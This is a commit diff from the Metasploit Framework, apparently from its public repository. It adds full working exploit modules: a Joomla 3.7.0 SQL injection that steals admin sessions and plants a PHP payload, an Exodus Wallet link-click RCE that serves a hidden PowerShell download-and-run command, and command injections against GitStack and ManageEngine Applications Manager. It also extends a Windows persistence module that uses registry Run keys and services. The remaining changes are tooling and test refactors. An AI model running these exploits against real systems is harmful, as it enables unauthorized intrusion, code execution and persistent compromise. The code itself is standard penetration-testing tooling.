Opt::RPORT('8080')
])
deregister_options('URIPATH')
@ -82,23 +97,29 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit
case target.name
when /Unix/, /Python/
when /Unix/, /Python/, /CMD/
execute_command(payload.encoded)
when /PowerShell/
execute_command(payload.encoded)
wait_for_session
else
execute_cmdstager
execute_cmdstager({:flavor => :certutil})
wait_for_session
end
end
# Exploit methods
def execute_command(cmd, opts = {})
cmd = case target.name
when /Unix/, /Linux/
%W{/bin/sh -c #{cmd}}
when /Python/
%W{python -c #{cmd}}
when /Windows/
when /Windows/, /CMD/
%W{cmd.exe /c #{cmd}}
when /PowerShell/
psh_opts = { :remove_comspec => true, :wrap_double_quotes => true }
%W{cmd.exe /c #{cmd_psh_payload(cmd, payload_instance.arch.first, psh_opts)}}
end
# Encode each command argument with XML entities
@ -113,6 +134,20 @@ class MetasploitModule < Msf::Exploit::Remote
)
end
def wait_for_session
print_status "Waiting for exploit to complete..."
begin
Timeout.timeout(datastore['ListenerTimeout']) do
loop do
break if session_created?
Rex.sleep(0.25)
end
end
rescue ::Timeout::Error
fail_with(Failure::Unknown, "Timeout waiting for exploit to complete")
end
end
def xstream_payload(cmd)
<<EOF
<map>

269
modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb Normal file
View File

@ -0,0 +1,269 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HTTP::Joomla
def initialize(info={})
super(update_info(info,
'Name' => 'Joomla Component Fields SQLi Remote Code Execution',
'Description' => %q{
This module exploits a SQL injection vulnerability in the com_fields
component, which was introduced to the core of Joomla in version 3.7.0.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mateus Lino', # Vulnerability discovery
'luisco100 <luisco100[at]gmail.com>' # Metasploit module
],
'References' =>
[
[ 'CVE', '2017-8917' ], # SQLi
[ 'EDB', '42033' ],
[ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
],
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as POST data, so
# really it's unlimited
'Space' => 262144, # 256k
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Joomla 3.7.0', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'May 17 2017',
'DefaultTarget' => 0))
end
def check
# Request using a non-existing table
val = sqli(rand_text_alphanumeric(rand(10)+6), 'check')
if val.nil?
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Vulnerable
end
end
def sqli(tableprefix, option)
# SQLi will grab Super User or Administrator sessions with a valid username and userid (else they are not logged in).
# The extra search for userid!=0 is because of our SQL data that's inserted in the session cookie history.
# This way we make sure that's excluded and we only get real Administrator or Super User sessions.
if option == 'check'
start = rand_text_alpha(5)
start_h = start.unpack('H*')[0]
fin = rand_text_alpha(5)
fin_h = fin.unpack('H*')[0]
sql = "(UPDATEXML(2170,CONCAT(0x2e,0x#{start_h},(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x#{fin_h}),4879))"
else
start = rand_text_alpha(3)
start_h = start.unpack('H*')[0]
fin = rand_text_alpha(3)
fin_h = fin.unpack('H*')[0]
sql = "(UPDATEXML(2170,CONCAT(0x2e,0x#{start_h},(SELECT MID(session_id,1,42) FROM #{tableprefix}session where userid!=0 LIMIT 1),0x#{fin_h}),4879))"
end
# Retrieve cookies
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => {
'option' => 'com_fields',
'view' => 'fields',
'layout'=> 'modal',
'list[fullordering]' => sql
}
})
if res && res.code == 500 && res.body =~ /#{start}(.*)#{fin}/
return $1
end
return nil
end
def exploit
# Request using a non-existing table first, to retrieve the table prefix
val = sqli(rand_text_alphanumeric(rand(10)+6), 'check')
if val.nil?
fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
else
table_prefix = Base64.decode64(val)
table_prefix.sub! '_session', ''
print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
end
# Retrieve the admin session using our retrieved table prefix
val = sqli("#{table_prefix}_", 'exploit')
if val.nil?
fail_with(Failure::Unknown, "#{peer}: No logged-in Administrator or Super User user found!")
else
auth_cookie_part = val
print_status("#{peer} - Retrieved cookie [ #{auth_cookie_part} ]")
end
# Retrieve cookies
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php')
})
if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
cookie_begin = $1
print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
else
fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
end
# Modify cookie to authenticated admin
auth_cookie = cookie_begin
auth_cookie << '='
auth_cookie << auth_cookie_part
auth_cookie << ';'
# Authenticated session
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
'cookie' => auth_cookie
})
if res && res.code == 200 && res.body =~ /Control Panel -(.*?)- Administration/
print_good("#{peer} - Successfully authenticated")
else
fail_with(Failure::Unknown, "#{peer} - Session failure")
end
# Retrieve template view
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
'cookie' => auth_cookie,
'vars_get' => {
'option' => 'com_templates',
'view' => 'templates'
}
})
# We try to retrieve and store the first template found
if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&amp;view=template&amp;id=([0-9]+)&amp;file=([a-zA-Z0-9=]+)/
template_id = $1
file_id = $2
form = res.body.split(/<form action=([^\>]+) method="post" name="adminForm" id="adminForm"\>(.*)<\/form>/mi)
input_hidden = form[2].split(/<input type="hidden"([^\>]+)\/>/mi)
input_id = input_hidden[7].split("\"")
input_id = input_id[1]
else
fail_with(Failure::Unknown, "Unable to retrieve template")
end
filename = rand_text_alphanumeric(rand(10)+6)
# Create file
print_status("#{peer} - Creating file [ #{filename}.php ]")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'administrator', 'index.php'),
'cookie' => auth_cookie,
'vars_get' => {
'option' => 'com_templates',
'task' => 'template.createFile',
'id' => template_id,
'file' => file_id,
},
'vars_post' => {
'type' => 'php',
'address' => '',
input_id => '1',
'name' => filename
}
})
# Grab token
if res && res.code == 303 && res.headers['Location']
location = res.headers['Location']
print_status("#{peer} - Following redirect to [ #{location} ]")
res = send_request_cgi(
'uri' => location,
'method' => 'GET',
'cookie' => auth_cookie
)
# Retrieving template token
if res && res.code == 200 && res.body =~ /&amp;([a-z0-9]+)=1\">/
token = $1
print_status("#{peer} - Token [ #{token} ] retrieved")
else
fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
end
if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
template_path = $1
print_status("#{peer} - Template path [ #{template_path} ] retrieved")
else
fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
end
else
fail_with(Failure::Unknown, "#{peer} - Creating file failed")
end
filename_base64 = Rex::Text.encode_base64("/#{filename}.php")
# Inject payload data into file
print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "administrator", "index.php"),
'cookie' => auth_cookie,
'vars_get' => {
'option' => 'com_templates',
'view' => 'template',
'id' => template_id,
'file' => filename_base64,
},
'vars_post' => {
'jform[source]' => payload.encoded,
'task' => 'template.apply',
token => '1',
'jform[extension_id]' => template_id,
'jform[filename]' => "/#{filename}.php"
}
})
if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
else
fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
end
# Request payload
register_files_for_cleanup("#{filename}.php")
print_status("#{peer} - Executing payload")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"),
'cookie' => auth_cookie
})
end
end

104
modules/exploits/windows/browser/exodus.rb Normal file
View File

@ -0,0 +1,104 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'Exodus Wallet (ElectronJS Framework) remote Code Execution',
'Description' => %q(
This module exploits a Remote Code Execution vulnerability in Exodus Wallet,
a vulnerability in the ElectronJS Framework protocol handler can be used to
get arbitrary command execution if the user clicks on a specially crafted URL.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Wflki', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'DefaultOptions' =>
{
'SRVPORT' => '80',
'URIPATH' => '/',
},
'References' =>
[
[ 'EDB', '43899' ],
[ 'BID', '102796' ],
[ 'CVE', '2018-1000006' ],
],
'Platform' => 'win',
'Targets' =>
[
['PSH (Binary)', {
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 25 2018'
))
register_advanced_options(
[
OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]),
], self.class
)
end
def gen_psh(url)
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
download_and_run = "#{ignore_cert}#{download_string}"
return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
end
def serve_payload(cli)
data = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
remove_comspec: true,
exec_in_place: true
)
print_status("Delivering Payload")
send_response_html(cli, data, 'Content-Type' => 'application/octet-stream')
end
def serve_page(cli)
psh = gen_psh("#{get_uri}payload")
psh_escaped = psh.gsub("\\","\\\\\\\\").gsub("'","\\\\'")
val = rand_text_alpha(5)
html = %Q|<html>
<!doctype html>
<script>
window.location = 'exodus://#{val}" --gpu-launcher="cmd.exe /k #{psh_escaped}" --#{val}='
</script>
</html>
|
send_response_html(cli, html)
end
def on_request_uri(cli, request)
case request.uri
when /payload$/
serve_payload(cli)
else
serve_page(cli)
end
end
end

301
modules/exploits/windows/http/gitstack_rce.rb Normal file
View File

@ -0,0 +1,301 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'GitStack Unsanitized Argument RCE',
'Description' => %q{
This module exploits a remote code execution vulnerability that
exists in GitStack through v2.3.10, caused by an unsanitized argument
being passed to an exec function call. This module has been tested
on GitStack v2.3.10.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Kacper Szurek', # Vulnerability discovery and PoC
'Jacob Robles' # Metasploit module
],
'References' =>
[
['CVE', '2018-5955'],
['EDB', '43777'],
['EDB', '44044'],
['URL', 'https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Targets' => [['Automatic', {}]],
'Privileged' => true,
'DisclosureDate' => 'Jan 15 2018',
'DefaultTarget' => 0))
end
def check_web
begin
res = send_request_cgi({
'uri' => '/rest/settings/general/webinterface/',
'method' => 'GET'
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
if res.body =~ /true/
vprint_good('Web interface is enabled')
return true
else
vprint_error('Web interface is disabled')
return false
end
else
print_error('Unable to determine status of web interface')
return nil
end
end
def check_repos
begin
res = send_request_cgi({
'uri' => '/rest/repository/',
'method' => 'GET',
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
begin
mylist = res.get_json_document
rescue JSON::ParserError => e
print_error("Failed: #{e.class} - #{e.message}")
return nil
end
if mylist.length == 0
vprint_error('No repositories found')
return false
else
vprint_good('Repositories found')
return mylist
end
else
print_error('Unable to determine available repositories')
return nil
end
end
def update_web(web)
data = {'enabled' => web}
begin
res = send_request_cgi({
'uri' => '/rest/settings/general/webinterface/',
'method' => 'PUT',
'data' => data.to_json
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("#{res.body}")
end
end
def create_repo
repo = Rex::Text.rand_text_alpha(5)
c_token = Rex::Text.rand_text_alpha(5)
begin
res = send_request_cgi({
'uri' => '/rest/repository/',
'method' => 'POST',
'cookie' => "csrftoken=#{c_token}",
'vars_post' => {
'name' => repo,
'csrfmiddlewaretoken' => c_token
}
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("#{res.body}")
return repo
else
print_status('Unable to create repository')
return nil
end
end
def delete_repo(repo)
begin
res = send_request_cgi({
'uri' => "/rest/repository/#{repo}/",
'method' => 'DELETE'
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("#{res.body}")
else
print_status('Failed to delete repository')
end
end
def create_user
user = Rex::Text.rand_text_alpha(5)
pass = user
begin
res = send_request_cgi({
'uri' => '/rest/user/',
'method' => 'POST',
'vars_post' => {
'username' => user,
'password' => pass
}
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("Created user: #{user}")
return user
else
print_error("Failed to create user")
return nil
end
end
def delete_user(user)
begin
res = send_request_cgi({
'uri' => "/rest/user/#{user}/",
'method' => 'DELETE'
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("#{res.body}")
else
print_status('Delete user unsuccessful')
end
end
def mod_user(repo, user, method)
begin
res = send_request_cgi({
'uri' => "/rest/repository/#{repo}/user/#{user}/",
'method' => method
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("#{res.body}")
else
print_status('Unable to add/remove user from repo')
end
end
def repo_users(repo)
begin
res = send_request_cgi({
'uri' => "/rest/repository/#{repo}/user/",
'method' => 'GET'
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
begin
users = res.get_json_document
users -= ['everyone']
rescue JSON::ParserError => e
print_error("Failed: #{e.class} - #{e.message}")
users = nil
end
else
return nil
end
return users
end
def run_exploit(repo, user, cmd)
begin
res = send_request_cgi({
'uri' => '/web/index.php',
'method' => 'GET',
'authorization' => basic_auth(user, "#{Rex::Text.rand_text_alpha(1)} && cmd /c #{cmd}"),
'vars_get' => {
'p' => "#{repo}.git",
'a' => 'summary'
}
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
end
def exploit
command = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ :remove_comspec => true, :encode_final_payload => true }
)
fail_with(Failure::PayloadFailed, "Payload exceeds space left in exec call") if command.length > 6110
web = check_web
repos = check_repos
if web.nil? || repos.nil?
return
end
unless web
update_web(!web)
# Wait for interface
sleep 8
end
if repos
pwn_repo = repos[0]['name']
else
pwn_repo = create_repo
end
r_users = repo_users(pwn_repo)
if r_users.present?
pwn_user = r_users[0]
run_exploit(pwn_repo, pwn_user, command)
else
pwn_user = create_user
if pwn_user
mod_user(pwn_repo, pwn_user, 'POST')
run_exploit(pwn_repo, pwn_user, command)
mod_user(pwn_repo, pwn_user, 'DELETE')
delete_user(pwn_user)
end
end
unless web
update_web(web)
end
unless repos
delete_repo(pwn_repo)
end
end
end

102
modules/exploits/windows/http/manageengine_appmanager_exec.rb Normal file
View File

@ -0,0 +1,102 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => "ManageEngine Applications Manager Remote Code Execution",
'Description' => %q(
This module exploits command injection vulnerability in the ManageEngine Application Manager product.
An unauthenticated user can execute a operating system command under the context of privileged user.
Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials
by accessing given system. This endpoint calls a several internal classes and then executes powershell script
without validating user supplied parameter when the given system is OfficeSharePointServer.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['CVE', '2018-7890'],
['BID', '103358'],
['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/'],
['URL', 'https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager']
],
'DefaultOptions' =>
{
'WfsDelay' => 10,
'RPORT' => 9090
},
'Payload' =>
{
'BadChars' => "\x22"
},
'Platform' => ['win'],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [['Automatic', {}]],
'Privileged' => true,
'DisclosureDate' => 'Mar 7 2018',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
]
)
end
def check
res = trigger_endpoint(Rex::Text.rand_text_alpha(3))
if res && res.body.include?('Kindly check the credentials and try again')
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') unless check == Exploit::CheckCode::Vulnerable
powershell_options = {
encode_final_payload: true,
remove_comspec: true
}
p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
print_status('Triggering the vulnerability')
trigger_endpoint("$(#{p})")
end
def trigger_endpoint(username)
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
'vars_post' => {
'method' => 'testCredentialForConfMonitors',
'type' => 'OfficeSharePointServer',
'montype' => 'OfficeSharePointServer',
'isAgentEnabled' => 'NO',
'isAgentAssociated' => 'false',
'displayname' => Rex::Text.rand_text_alpha(rand(10..15)),
'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
'Powershell' => 'True', # :-)
'CredSSP' => 'False',
'SPType' => 'SPServer',
'CredentialDetails' => 'nocm',
'Password' => Rex::Text.rand_text_alpha(3),
'UserName' => username
}
)
end
end

3
modules/exploits/windows/local/ms_ndproxy.rb
View File

@ -156,7 +156,8 @@ class MetasploitModule < Msf::Exploit::Local
def check
if sysinfo['Architecture'] == ARCH_X64
return Exploit::CheckCode::Detected
vprint_error 'Running against 64-bit systems is not supported'
return CheckCode::Safe
end
handle = open_device('\\\\.\\NDProxy', 0x0, 0x0, 0x3)

66
modules/post/windows/manage/persistence_exe.rb
View File

@ -3,12 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'
require 'msf/core/post/windows/services'
class MetasploitModule < Msf::Post
include Msf::Post::Common
include Msf::Post::File
@ -34,10 +28,18 @@ class MetasploitModule < Msf::Post
register_options(
[
OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER', 'SYSTEM', 'SERVICE']]),
OptPath.new('REXEPATH', [true, 'The remote executable to use.']),
OptPath.new('REXEPATH', [true, 'The remote executable to upload and execute.']),
OptString.new('REXENAME', [true, 'The name to call exe on remote system', 'default.exe'])
], self.class
)
register_advanced_options(
[
OptString.new('LocalExePath', [false, 'The local exe path to run. Use temp directory as default. ']),
OptString.new('StartupName', [false, 'The name of service or registry. Random string as default.' ]),
OptString.new('ServiceDescription', [false, 'The description of service. Random string as default.' ])
])
end
# Run Method for when run command is issued
@ -123,11 +125,12 @@ class MetasploitModule < Msf::Post
# Function to install payload in to the registry HKLM or HKCU
#-------------------------------------------------------------------------------
def write_to_reg(key, script_on_target)
nam = Rex::Text.rand_text_alpha(rand(8) + 8)
nam = datastore['StartupName'] || Rex::Text.rand_text_alpha(rand(8) + 8)
print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
if key
registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", nam, script_on_target, "REG_SZ")
print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}")
@clean_up_rc << "reg deleteval -k '#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -v '#{nam}'\n"
else
print_error("Error: failed to open the registry key for writing")
end
@ -138,9 +141,21 @@ class MetasploitModule < Msf::Post
def install_as_service(script_on_target)
if is_system? || is_admin?
print_status("Installing as service..")
nam = Rex::Text.rand_text_alpha(rand(8) + 8)
nam = datastore['StartupName'] || Rex::Text.rand_text_alpha(rand(8) + 8)
description = datastore['ServiceDescription'] || Rex::Text.rand_text_alpha(8)
print_status("Creating service #{nam}")
service_create(nam, :path=>"cmd /c \"#{script_on_target}\"")
key = service_create(nam, :path=>"cmd /c \"#{script_on_target}\"",:display=>description)
# check if service had been created
if key != 0
print_error("Service #{nam} creating failed.")
return
end
# if service is stopped, then start it.
service_start(nam) if service_status(nam)[:state] == 1
@clean_up_rc << "execute -H -f sc -a \"delete #{nam}\"\n"
else
print_error("Insufficient privileges to create service")
@ -150,15 +165,34 @@ class MetasploitModule < Msf::Post
# Function for writing executable to target host
#-------------------------------------------------------------------------------
def write_exe_to_target(rexe, rexename)
tempdir = session.fs.file.expand_path("%TEMP%")
temprexe = tempdir + "\\" + rexename
# check if we have write permission
# I made it by myself because the function filestat.writable? was not implemented yet.
if not datastore['LocalExePath'].nil?
begin
temprexe = datastore['LocalExePath'] + "\\" + rexename
write_file_to_target(temprexe,rexe)
rescue Rex::Post::Meterpreter::RequestError
print_warning("Insufficient privileges to write in #{datastore['LocalExePath']}, writing to %TEMP%")
temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
write_file_to_target(temprexe,rexe)
end
# Write to %temp% directory if not set LocalExePath
else
temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
write_file_to_target(temprexe,rexe)
end
print_good("Persistent Script written to #{temprexe}")
@clean_up_rc << "rm #{temprexe.gsub("\\", "\\\\\\\\")}\n"
temprexe
end
def write_file_to_target(temprexe,rexe)
fd = session.fs.file.new(temprexe, "wb")
fd.write(rexe)
fd.close
print_good("Persistent Script written to #{temprexe}")
@clean_up_rc << "rm #{temprexe}\n"
temprexe
end
# Function to create executable from a file

3
msfvenom
View File

@ -135,6 +135,7 @@ def parse_args(args)
end
opt.on('-b', '--bad-chars <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
require 'rex/text'
opts[:badchars] = Rex::Text.hex_to_raw(b)
end
@ -188,7 +189,7 @@ def parse_args(args)
datastore[k.upcase] = v.to_s
end
if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil?
init_framework
require 'rex/socket'
datastore['LHOST'] = Rex::Socket.source_address
end
end

2
spec/factories/mdm/exported_web_vulns.rb
View File

@ -1,4 +1,4 @@
FactoryGirl.define do
FactoryBot.define do
factory :exported_web_vuln, :parent => :mdm_web_vuln do
blame { generate :mdm_web_vuln_blame }
description { generate :mdm_web_vuln_description }

2
spec/factories/mdm/module_details.rb
View File

@ -1,4 +1,4 @@
FactoryGirl.modify do
FactoryBot.modify do
factory :mdm_module_detail do
transient do
root {

6
spec/lib/metasploit/framework/jtr/wordlist_spec.rb
View File

@ -9,9 +9,9 @@ RSpec.describe Metasploit::Framework::JtR::Wordlist do
let(:expansion_word) { 'Foo bar_baz-bat.bam\\foo//bar' }
let(:common_root_path) { File.expand_path('fake_common_roots.txt',FILE_FIXTURES_PATH) }
let(:default_wordlist_path) { File.expand_path('fake_default_wordlist.txt',FILE_FIXTURES_PATH) }
let(:password) { FactoryGirl.create(:metasploit_credential_password) }
let(:public) { FactoryGirl.create(:metasploit_credential_public) }
let(:realm) { FactoryGirl.create(:metasploit_credential_realm) }
let(:password) { FactoryBot.create(:metasploit_credential_password) }
let(:public) { FactoryBot.create(:metasploit_credential_public) }
let(:realm) { FactoryBot.create(:metasploit_credential_realm) }
let(:mutate_me) { 'password' }
let(:mutants) { [
"pa55word",

14
spec/lib/msf/core/auxiliary/cisco_spec.rb
View File

@ -32,21 +32,21 @@ RSpec.describe Msf::Auxiliary::Cisco do
subject(:aux_cisco) { DummyClass.new }
let!(:workspace) { FactoryGirl.create(:mdm_workspace) }
let!(:workspace) { FactoryBot.create(:mdm_workspace) }
context '#create_credential_and_login' do
let(:session) { FactoryGirl.create(:mdm_session) }
let(:session) { FactoryBot.create(:mdm_session) }
let(:task) { FactoryGirl.create(:mdm_task, workspace: workspace)}
let(:task) { FactoryBot.create(:mdm_task, workspace: workspace)}
let(:user) { FactoryGirl.create(:mdm_user)}
let(:user) { FactoryBot.create(:mdm_user)}
subject(:test_object) { DummyClass.new }
let(:workspace) { FactoryGirl.create(:mdm_workspace) }
let(:service) { FactoryGirl.create(:mdm_service, host: FactoryGirl.create(:mdm_host, workspace: workspace)) }
let(:task) { FactoryGirl.create(:mdm_task, workspace: workspace) }
let(:workspace) { FactoryBot.create(:mdm_workspace) }
let(:service) { FactoryBot.create(:mdm_service, host: FactoryBot.create(:mdm_host, workspace: workspace)) }
let(:task) { FactoryBot.create(:mdm_task, workspace: workspace) }
let(:login_data) {
{

18
spec/lib/msf/core/exploit/auto_target_spec.rb
View File

@ -50,7 +50,7 @@ RSpec.describe Msf::Exploit::AutoTarget do
describe '#auto_target?' do
it 'should return true if the automatic target is selected' do
host_addr = '192.168.1.5'
host_obj = FactoryGirl.create(:mdm_host, address: host_addr )
host_obj = FactoryBot.create(:mdm_host, address: host_addr )
windows_exploit.datastore['TARGET'] = 0
windows_exploit.datastore['WORKSPACE'] = host_obj.workspace.name
windows_exploit.datastore['RHOST'] = host_addr
@ -71,7 +71,7 @@ RSpec.describe Msf::Exploit::AutoTarget do
context 'finding the target host' do
it 'should return a matching Mdm::host if there is one' do
host_addr = '192.168.1.5'
host_obj = FactoryGirl.create(:mdm_host, address: host_addr )
host_obj = FactoryBot.create(:mdm_host, address: host_addr )
windows_exploit.datastore['WORKSPACE'] = host_obj.workspace.name
windows_exploit.datastore['RHOST'] = host_addr
expect(windows_exploit.auto_target_host).to eq host_obj
@ -84,12 +84,12 @@ RSpec.describe Msf::Exploit::AutoTarget do
end
context 'filtering targets' do
let(:windows_xp_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP' ) }
let(:windows_xp_sp1_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP', os_sp: 'SP1' ) }
let(:windows_xp_sp2_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP', os_sp: 'SP2' ) }
let(:windows_xp_sp3_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP', os_sp: 'SP3' ) }
let(:windows_7_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows 7' ) }
let(:unknown_host) { FactoryGirl.create(:mdm_host, address: '192.168.172.150', os_family: nil ) }
let(:windows_xp_host) { FactoryBot.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP' ) }
let(:windows_xp_sp1_host) { FactoryBot.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP', os_sp: 'SP1' ) }
let(:windows_xp_sp2_host) { FactoryBot.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP', os_sp: 'SP2' ) }
let(:windows_xp_sp3_host) { FactoryBot.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows XP', os_sp: 'SP3' ) }
let(:windows_7_host) { FactoryBot.create(:mdm_host, address: '192.168.172.150', os_family: 'Windows', os_name: 'Windows 7' ) }
let(:unknown_host) { FactoryBot.create(:mdm_host, address: '192.168.172.150', os_family: nil ) }
let(:potential_targets) { windows_exploit.filter_by_os_family(windows_xp_host) }
let(:xp_targets) { windows_exploit.filter_by_os_name(potential_targets,windows_xp_host) }
@ -182,4 +182,4 @@ RSpec.describe Msf::Exploit::AutoTarget do
end
end

4
spec/lib/msf/core/module_set_spec.rb
View File

@ -6,7 +6,7 @@ RSpec.describe Msf::ModuleSet do
}
let(:module_type) {
FactoryGirl.generate :mdm_module_detail_mtype
FactoryBot.generate :mdm_module_detail_mtype
}
context '#rank_modules' do
@ -207,4 +207,4 @@ RSpec.describe Msf::ModuleSet do
end
end
end
end
end

4
spec/lib/msf/db_manager/export_spec.rb
View File

@ -14,7 +14,7 @@ RSpec.describe Msf::DBManager::Export do
end
let(:workspace) do
